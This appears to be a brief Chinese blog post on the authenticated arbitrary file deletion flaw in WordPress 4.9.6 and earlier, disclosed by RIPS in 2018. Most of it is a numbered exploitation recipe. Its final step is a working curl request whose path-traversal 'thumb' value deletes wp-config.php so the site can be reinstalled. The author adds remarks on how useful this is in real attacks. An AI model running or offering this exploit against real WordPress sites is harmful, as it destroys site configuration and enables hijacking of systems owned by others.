WordPress <= 4.9.6 任意文件删除漏洞

WordPress是如今使用最为广泛的一套内容管理系统。根据 w3tech 统计,全世界大概有30%的网站运行着WordPress程序。

RIPS团队于2018年06月26日公开了Wordpress的一个任意文件删除漏洞(需要登录),该漏洞影响 WordPress 4.9.6及以下版本。

利用方法

  1. 注册目标账号

  2. 访问 http://xxxxx.xxx.com/wp-admin/upload.php, 上传任意图片.

  3. 访问 http://xxxxx.xxx.com/wp-admin/post.php?post=4&action=edit. 在网页源代码中找到 _wpnonce

  4. 利用exp
    curl -v 'http://xxxxx.xxx.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

这时候删除了wp-config.php,既能重装wordpress

不过没有数据库账号。估计实战中挺蛋疼的

发表评论

电子邮件地址不会被公开。 必填项已用*标注